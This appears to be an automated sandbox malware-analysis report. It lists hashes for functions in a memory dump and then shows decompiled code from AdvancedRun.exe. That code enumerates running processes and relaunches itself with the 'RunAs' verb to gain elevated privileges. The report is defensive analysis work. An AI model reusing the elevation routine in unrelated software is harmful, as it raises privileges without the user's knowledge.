                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f201de24f9bb2a07b569912ee151245754c0632426f7033f432f476470f8486
                                                                                      • Instruction ID: 924447413398c5e6f5f33950918373671076e8698b93d8a8843c526ea005a2c4
                                                                                      • Opcode Fuzzy Hash: 8f201de24f9bb2a07b569912ee151245754c0632426f7033f432f476470f8486
                                                                                      • Instruction Fuzzy Hash: 0D018C30905298EFCB41DFA8E8456ACBFB1AF05304F6080F9C008EB693D7355E44CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A28AD8, Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6fd4c68b1fd134d56860703fd931c155c00a9a8ae786684f07809a6886076ec1
                                                                                      • Instruction ID: cb38a576188f1f65460dd4594c159968c1681605ff173d4d3917e9269f460106
                                                                                      • Opcode Fuzzy Hash: 6fd4c68b1fd134d56860703fd931c155c00a9a8ae786684f07809a6886076ec1
                                                                                      • Instruction Fuzzy Hash: 0DF08271A01128AFDB00DF6DE805AAEBBE5EB88361F10C476F90887210DA358D129B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A20500, Relevance: .0, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e77347849e51c20619a3006b0ca3f7fb5913f3c39fb87bca7f0cb67e7af5b32
                                                                                      • Instruction ID: f010dc9ffb51e9ae5e35ccc56830152f8bda9d0549eb504ee454287c50e75993
                                                                                      • Opcode Fuzzy Hash: 1e77347849e51c20619a3006b0ca3f7fb5913f3c39fb87bca7f0cb67e7af5b32
                                                                                      • Instruction Fuzzy Hash: D6F0F930E05218EFCB44EFA8E4899ACBBB1AB44304F6080B8D509AB255DB355F84DF41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A22A10, Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a5cf18fa3b0baf87dd2c626423bf59fa42e4642774da2ad8a621479b4a4099b9
                                                                                      • Instruction ID: aefc1fdaddb59202cae5edf6daa66420d6724816ee3356af503dfd2a59cc8cbb
                                                                                      • Opcode Fuzzy Hash: a5cf18fa3b0baf87dd2c626423bf59fa42e4642774da2ad8a621479b4a4099b9
                                                                                      • Instruction Fuzzy Hash: 51E09234240314BBD724CF20EC45F6E37A7AB84781F908825F6019E594CB76E952D754
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A225DA, Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73b0a2bf282ead7a2225b6cc24737969bdff2c324dd4bec503ad06a133a65faf
                                                                                      • Instruction ID: 9b1447f8b3d40dd72a2b852022e5dc11b95a73067c4e07ef31eda31f429cfebb
                                                                                      • Opcode Fuzzy Hash: 73b0a2bf282ead7a2225b6cc24737969bdff2c324dd4bec503ad06a133a65faf
                                                                                      • Instruction Fuzzy Hash: D8F05E71A01229EFDB14EB94F658BAE77B2BF48304F604439E402B7750DB789E469BC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A225E3, Relevance: .0, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71cb63bc5f574bcced06eea7a8cc8daf1596bd3c96b5b161464316f0e71f7d95
                                                                                      • Instruction ID: efb9419481c29831a5c21953de07dd061fb98bc4134df3774a5797bf5d1fa678
                                                                                      • Opcode Fuzzy Hash: 71cb63bc5f574bcced06eea7a8cc8daf1596bd3c96b5b161464316f0e71f7d95
                                                                                      • Instruction Fuzzy Hash: A6F05E31A01219EFCB14EBA4F655BAE77B2AF48344F204438E402E7750DF349D469BC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A22830, Relevance: .0, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ef5583cfc0c50e9099d5d4f619cb526d28ad81f96996650003c5f4b30abd192
                                                                                      • Instruction ID: 1d6d400a4c989b9459a749eef1ba5a7a303a58bc8e7120ba28052a77bc43f610
                                                                                      • Opcode Fuzzy Hash: 4ef5583cfc0c50e9099d5d4f619cb526d28ad81f96996650003c5f4b30abd192
                                                                                      • Instruction Fuzzy Hash: D4E0D8213091C01FC305627598219AE3BE98BC751470588A7D108EB3A3C964CC0D83E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A20468, Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 618c566e24127f6576141a2d2cbe48c5a9ec72e21d541840481c899d59205e34
                                                                                      • Instruction ID: 2c308fefa5a51adcf2f85cad95c0c1789a1ebb0063f2c66e5d5cd7493fcaab75
                                                                                      • Opcode Fuzzy Hash: 618c566e24127f6576141a2d2cbe48c5a9ec72e21d541840481c899d59205e34
                                                                                      • Instruction Fuzzy Hash: E6E0DF347001308B4B256B68781C26C3ADAFBC8622306C028E407C33D1CF7C8E038B8D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A27DA1, Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5651956b9fa42fe5b45db63d7a70c520fd34b08c358e0ad70f4ee77dc057001d
                                                                                      • Instruction ID: f0c0fda3552691e549955dca336c7fd5a5a3b4d661250a398531626330a2f4a4
                                                                                      • Opcode Fuzzy Hash: 5651956b9fa42fe5b45db63d7a70c520fd34b08c358e0ad70f4ee77dc057001d
                                                                                      • Instruction Fuzzy Hash: 36D0123210D2B42FD716115E3C569AB6FACC5833B073600B7E488C715294095C454375
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A205E0, Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b1ce6c891ff8af7f9fbf2c56508c0a71dfbc2fe15cec8b5f22c6225efe19d9ec
                                                                                      • Instruction ID: 7507cc1113e8e432aafc448cebaa19da5e45224c32c4e35d2905af2197419031
                                                                                      • Opcode Fuzzy Hash: b1ce6c891ff8af7f9fbf2c56508c0a71dfbc2fe15cec8b5f22c6225efe19d9ec
                                                                                      • Instruction Fuzzy Hash: 42E08C307000205BC614A6ACA420BAE32DECBC8314F0448269A05EBB86DFD0AC0847E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A20567, Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7db98fa9b4939790d56753cc1be58c957787661e3dd2f372d68e25c5d00f87a
                                                                                      • Instruction ID: 7f044f6aa059bd05d2d73412f14ee4b4aa8efd25edbb771cacba9848f477c94f
                                                                                      • Opcode Fuzzy Hash: a7db98fa9b4939790d56753cc1be58c957787661e3dd2f372d68e25c5d00f87a
                                                                                      • Instruction Fuzzy Hash: 1EE0653110C3D04FC725EB38A4505CDBBB2AE822947154AEDD0458F567C769A94DC769
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2F5AC, Relevance: .0, Instructions: 20COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b0dbb663f4dafa59cfdc0c1e9e491431ff44d03d126c743f8aadeece3d8956c9
                                                                                      • Instruction ID: 17549626526a85f55f4f722d6c417431c3e09da369be5cffa7621f0d561b8ab7
                                                                                      • Opcode Fuzzy Hash: b0dbb663f4dafa59cfdc0c1e9e491431ff44d03d126c743f8aadeece3d8956c9
                                                                                      • Instruction Fuzzy Hash: 0FE08C30B091409BDB04DAA4FA565EC7732DB80309F208132E2029A594CB21AC495641
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A22840, Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3272929b94895d673cf308312c6374402010c70aa277b261335c4060c49d291d
                                                                                      • Instruction ID: 7c916ca6a229c359a7cf67b2bd3a8609c7eb0812684722b838dece27f41ea35e
                                                                                      • Opcode Fuzzy Hash: 3272929b94895d673cf308312c6374402010c70aa277b261335c4060c49d291d
                                                                                      • Instruction Fuzzy Hash: 2CD0A731700010278254B5AEE410AAF73DFCBC9624B004839920CE7745DEA06C0A43F4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A24360, Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec84141c02fe34afad97014bcc2de140f672558b167aa6333edb4254c8bb23dd
                                                                                      • Instruction ID: 6fc8593ebfda2f391bbf515e2e58834b6d3768baa23d9c8688ef02556cacbb1e
                                                                                      • Opcode Fuzzy Hash: ec84141c02fe34afad97014bcc2de140f672558b167aa6333edb4254c8bb23dd
                                                                                      • Instruction Fuzzy Hash: C0E0C22100C3C54FC346E770AC1945C7B669A83108309CE9691486F4AFDF6C8849CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2F58A, Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8648d7db2c2c91f918b40cb372a2adc23804b9f9725208e2b86a4ce2622478c9
                                                                                      • Instruction ID: a7f5981b5261956d080d3cbc397e5200e74b3ca71de17fdbbff9ba8776d80542
                                                                                      • Opcode Fuzzy Hash: 8648d7db2c2c91f918b40cb372a2adc23804b9f9725208e2b86a4ce2622478c9
                                                                                      • Instruction Fuzzy Hash: AFD05E31B05154ABDB04D6A4F9516ECB332DB80319F204172A2065B6C4CBA21D4C5241
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A205B0, Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c37db23c8a554540941019a10ca5564459a5263193e9767791d273d35c74b85
                                                                                      • Instruction ID: c131aaacb4fbc5f8ea6452492534ea947e6dfdab194afbec1eac81f88f298a8b
                                                                                      • Opcode Fuzzy Hash: 1c37db23c8a554540941019a10ca5564459a5263193e9767791d273d35c74b85
                                                                                      • Instruction Fuzzy Hash: ADD0C97020A7909FCF165B39A5185043B729B17345B4188E6C4818A2ABD635A406CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A29F7F, Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 037ebc7b878ed5b970d4d136eab1a746635d2f51cd3a1d51efbb1cfcc9f03c91
                                                                                      • Instruction ID: afb9f0d61bd3df64b8b795e60e96d2a0d6de80cdedc48232169090920c2edfa9
                                                                                      • Opcode Fuzzy Hash: 037ebc7b878ed5b970d4d136eab1a746635d2f51cd3a1d51efbb1cfcc9f03c91
                                                                                      • Instruction Fuzzy Hash: 46D0123000D79C9FC7029F65A9945953F64DD5250430541C6D45D8F043D164AA1DC717
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A24370, Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e18c00149985d15706cd7b10a49240ee00d52c47f3d4c2254d42374cc93a76c8
                                                                                      • Instruction ID: 65b2cfb9996257e9e7cdfc82c5175e4898385a5729ecc36f8caa75b3f182d99d
                                                                                      • Opcode Fuzzy Hash: e18c00149985d15706cd7b10a49240ee00d52c47f3d4c2254d42374cc93a76c8
                                                                                      • Instruction Fuzzy Hash: 05C012300046095B8680FB60F84945D336B9781159741CC2091086F46EDF7D55494785
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A287A0, Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24de544af1a3dc1cddaf4cc8e269d59eb01934176791be26a1a89ef43cb4a864
                                                                                      • Instruction ID: a027b7eceae3b914b2fd15ed8129828d589655ac660982d2012219c07cda6a03
                                                                                      • Opcode Fuzzy Hash: 24de544af1a3dc1cddaf4cc8e269d59eb01934176791be26a1a89ef43cb4a864
                                                                                      • Instruction Fuzzy Hash: 45C0121090E2C08FCB1387208C6A5093F728B42384B2A84CAE0C1CB5B7D8388815D3A3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A226BA, Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9810cddfc676983726c931c37db9e4a02ac6a888fd5fed6bce01954839822aed
                                                                                      • Instruction ID: a76bdf4d44aa03de1118bfcde555a8072ebef36d7ebf6e40cb1733c66be459f9
                                                                                      • Opcode Fuzzy Hash: 9810cddfc676983726c931c37db9e4a02ac6a888fd5fed6bce01954839822aed
                                                                                      • Instruction Fuzzy Hash: B5C04C3A740015CFCB04DF58F444CD87770EB8926A70100A6E6099B231D731ED55CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A29F90, Relevance: .0, Instructions: 5COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d69ad1ff7cc10fdc91570120cb95c85e86a4cbebdeb684f3e51129225c8ca5a5
                                                                                      • Instruction ID: 76ca5f68f0bce338c87a42143ee012eb9cc80a0dc0d8cea669746600956e99ba
                                                                                      • Opcode Fuzzy Hash: d69ad1ff7cc10fdc91570120cb95c85e86a4cbebdeb684f3e51129225c8ca5a5
                                                                                      • Instruction Fuzzy Hash: EF90023104471C8B554027967509555775DD5445297800051A61D455025AA969104996
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Analysis Process: AdvancedRun.exe PID: 4436 Parent PID: 4952 AdvancedRun.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 93%
                                                                                      			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                      0x00409609
                                                                                      0x0040960f
                                                                                      0x00409619
                                                                                      0x00409623
                                                                                      0x0040962e
                                                                                      0x00409633
                                                                                      0x00409640
                                                                                      0x0040964a
                                                                                      0x00409782
                                                                                      0x0040965a
                                                                                      0x0040965f
                                                                                      0x00409678
                                                                                      0x0040967e
                                                                                      0x00409681
                                                                                      0x00409685
                                                                                      0x00409688
                                                                                      0x004096b2
                                                                                      0x004096bf
                                                                                      0x004096c6
                                                                                      0x004096cb
                                                                                      0x004096da
                                                                                      0x004096e6
                                                                                      0x0040973b
                                                                                      0x00409747
                                                                                      0x0040975f
                                                                                      0x00409764
                                                                                      0x0040976a
                                                                                      0x00409770
                                                                                      0x00409773
                                                                                      0x0040977d
                                                                                      0x00000000
                                                                                      0x0040977d
                                                                                      0x004096ee
                                                                                      0x004096f5
                                                                                      0x004096fc
                                                                                      0x00409704
                                                                                      0x0040970c
                                                                                      0x0040971c
                                                                                      0x0040971c
                                                                                      0x00409704
                                                                                      0x00409721
                                                                                      0x00409728
                                                                                      0x00409739
                                                                                      0x00409739
                                                                                      0x00000000
                                                                                      0x00409728
                                                                                      0x00409693
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004096a5
                                                                                      0x004096a9
                                                                                      0x004096ac
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004096ac
                                                                                      0x004097a6

                                                                                      APIs
                                                                                        • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                      • memset.MSVCRT ref: 0040962E
                                                                                      • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                      • memset.MSVCRT ref: 004096C6
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                      • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                      • API String ID: 239888749-1740548384
                                                                                      • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                      • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				int _t41;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68); // executed
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
					if(_t41 != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}













                                                                                      0x00401c31
                                                                                      0x00401c33
                                                                                      0x00401c48
                                                                                      0x00401c4f
                                                                                      0x00401c61
                                                                                      0x00401c68
                                                                                      0x00401c74
                                                                                      0x00401c79
                                                                                      0x00401c7a
                                                                                      0x00401c7b
                                                                                      0x00401c84
                                                                                      0x00401c89
                                                                                      0x00401c8e
                                                                                      0x00401c8f
                                                                                      0x00401c9b
                                                                                      0x00401ca6
                                                                                      0x00401caf
                                                                                      0x00401cb9
                                                                                      0x00401cc0
                                                                                      0x00401cc7
                                                                                      0x00401cce
                                                                                      0x00401cd5
                                                                                      0x00401cdd
                                                                                      0x00401ce0
                                                                                      0x00401d14
                                                                                      0x00401ce2
                                                                                      0x00401ce8
                                                                                      0x00401cf3
                                                                                      0x00401cf6
                                                                                      0x00401cfe
                                                                                      0x00401d09
                                                                                      0x00401d09
                                                                                      0x00401cfe
                                                                                      0x00401d1b

                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                      • memset.MSVCRT ref: 00401C4F
                                                                                      • memset.MSVCRT ref: 00401C68
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00401C8F
                                                                                      • memset.MSVCRT ref: 00401C9B
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                      • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                      • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                      • GetLastError.KERNEL32 ref: 00401D0E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                      • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                      • API String ID: 903100921-3385179869
                                                                                      • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                      • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

